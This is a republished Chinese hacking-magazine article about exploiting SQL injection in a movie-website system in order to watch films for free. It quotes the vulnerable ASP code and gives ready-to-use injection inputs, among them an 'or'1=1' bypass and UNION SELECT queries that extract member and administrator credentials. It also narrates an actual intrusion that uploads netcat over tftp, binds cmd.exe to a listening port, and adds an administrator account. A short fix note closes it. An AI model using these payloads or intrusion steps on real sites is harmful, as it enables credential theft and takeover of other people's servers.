union查询轻松免费看电影 数据库安全

union查询轻松免费看电影 数据库安全 union查询轻松免费看电影 数据库安 全 sql注入奇招致胜union查询轻松免费看电影_数据库安全2011-03-09 22:48 此文发在2004年黑客X档案第4期 周末无聊，同学想让我帮他下载一些电影看，我爽快的答应了。看了这么多期X档案，水平自然长进不少，也没事玩玩"鸡"。这次想免费下载些电影，没问(我知道N多电影程序有漏洞)。闲话少说，切入正题。 我打开Google，随便搜索了一下电影网站，点开了一个。看了一下界面，知道和金梅电影系统关联很大。金梅系统和"洞"网(7.0安全多啦，自己想的)差不多，也是有N多漏洞，比如注入啊，COOKIE欺骗什么的。我就在X档案03年11期看过一篇文章，写的是用ASC和MID函数对系统管理员帐户进行猜测。我也想用这种猜测，猜了半天都没猜对，真烦人，同学还在那边等我哪，这不是很丢人。我决定找个简单的办法，还是读读源码吧～ 下载了一个金梅三电影系统，看了一下，这么多个文件，头马上大了。还是在自己电脑上运行一下吧。注册了一个用户，点了一下找回密码，别人说这里有漏洞。看了一下，象是有漏洞的界面，有三个参数，还直接把密码显示出来。好，看一下源码。 39%if request("myuserid")=""then% 58%else set rs=server.createobject("adodb.recordset") sql="select password from users where userid="&request("myuserid")&"and city="&request("ask")&"and adress="&request("answer")&"" rs.open sql,conn,1,1 if rs.eof and rs.bof then% 这里果然没过滤。好多人都想到了可以用上面的方法注入了。能不能有更简单的方法呢? 我仔细考虑语句的形式如下: select password from users where userid='and city='and adress=' 如果用户名，密码提示问题(city)，密码提示答案(adress)和表users一行匹配，便打印这行的password,而且是明文的。我想的过程就不写了，后来我想到了一种方法，就是利用union查询。Access功能是很弱的，不能执行命令，不能导出文本，还不能注释。有个子查询可以利用之外，也就剩下这个union了。 怎么利用呢?先在本机做实验。测试过程简略，直接写有所收获的结果。 要是知道了一个该网站的一个用户名(比如abc)，可以这样利用。 在"你注册问题"处填:abc or'1=1(如果用户名是bcd,就变为bcd or'1=1) 密码提示问题处随便填几个字母或数字，最好别有符号，容易影响结果:比如字母a 密码提示答案处随便填几个字母或数字，填个a 回车后就看到该用户的密码了，简单吧(如图一)。 其实这样一来，上面的语句就变为: select password from users where userid='abc or'1=1'and city='a'and adress=a' 呵呵，程序无条件的执行了，因为被or'1=1跳过后面的验证了。 可是网站用户名也不是轻易得到的啊。别急，得到用户名一样简单。如下: 在"你注册问题"处随便处填几个字母或数字，最好别有符号，容易影响结果:比如字母a 密码提示问题处和上面一样，随便填:我也填个a 关键是在密码提示答案:我填的是a union select userid from users where oklook=3 or 0 上面就是要找黄金用户的帐户名(如图二)，看到用户名后再用前面的方法 找到密码。 可以在where后面加很多参数并赋不同的值可以得到很多帐户。 按上面的填入后输入语句就变成了: select password from users where userid='a'and city='a'and adress=a union select userid from users where oklook=3 or 0' 细心的读者看到这可能已经想到怎样得到管理员的帐号和密码，不错，也 很简单。我也不写过程了，直接写出语句如下: 得到帐号: select password from users where userid='a'and city='a'and adress=a union select name from okwiantgo where id=1 or 0' 得到密码: select password from users where userid='a'and city='a'and adress=a union select pwd from okwiantgo where id=1 or 0' 然后登陆就行了，路径格式为: 网站电影路径/findaccout.asp?name=管理员帐号&pwd=管理员密码 回车，很轻松就进管理界面了。(如图三) 有时findaccount.asp可能被改名了，这时只能拿个黄金帐户了。 这个漏洞有很多电影程序有，有的程序表名不是okwiantgo(程序会64行属性不对)，改成admin或password.,把上面的输入稍微修改一下行了。这样一来不管是多复杂的密码,或者是中文密码都没问题。再猜管理员帐户的时候也要多，where后面的条件多变化才行，否则可能得不到超级管理员。 这个漏洞使用很简单，危害极大，轻易可以得到管理员帐户。如果系统配置不当，在upload/uploadmovie.asp允许上传ASP文件，系统就很容易换主人了。我曾经成功渗透过这样一个网站，简单过程叙述如下。 上传一个ASP程序，发现该系统运行SQLSERVER，通过读源文件看到了sa的密码，用sqlexec连接，tftp上传nc.exe。再次dir发现nc被删了，有防火强。用tftp上传nc.jpg肯定万无一失，tftp-i我的IP get nc.exe nc.jpg, 上传成功。在sqlexec运行 nc.jpg-l-p 99-e c\winnt\system32\cmd.exe nc想必都很熟悉了吧，上面就是再目标机器上开一个99端口监听，同时把cmd.exe重定向到这里，本地连接nc.exe-vv目标IP 99,得到shell,而且是管理员权限。 输入net user abc 123456/add&&net localgroup administrators abc/add 添加用户成功顺便加入管理员，&&意思是前面成功后面执行。该系统开着3389，省了我好多事情。 好了回到正题，这个漏洞存在80%以上电影程序中，在google里搜索user/wantpws.asp，打开后发现可以输入三个参数，且把密码直接显示的都有此漏洞。 修补方法，应该对三个参数进行严格验证，而且把结果发送的到邮箱里更稳妥，有的网站是这样做的。 :我写此问的目的是想说好多问题要多想多试，一个漏洞利用方法不只一种，我们要自己学会发现。入侵过程灵活多样，我们应动脑筋。大家免费看电影的同时可别搞破坏啊，任何后果与我无关。同时我也希望看到这篇文章后，网站尽快更改。 文章整理:西部数码--专业提供、虚拟主机服务 以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以 上信息，谢谢～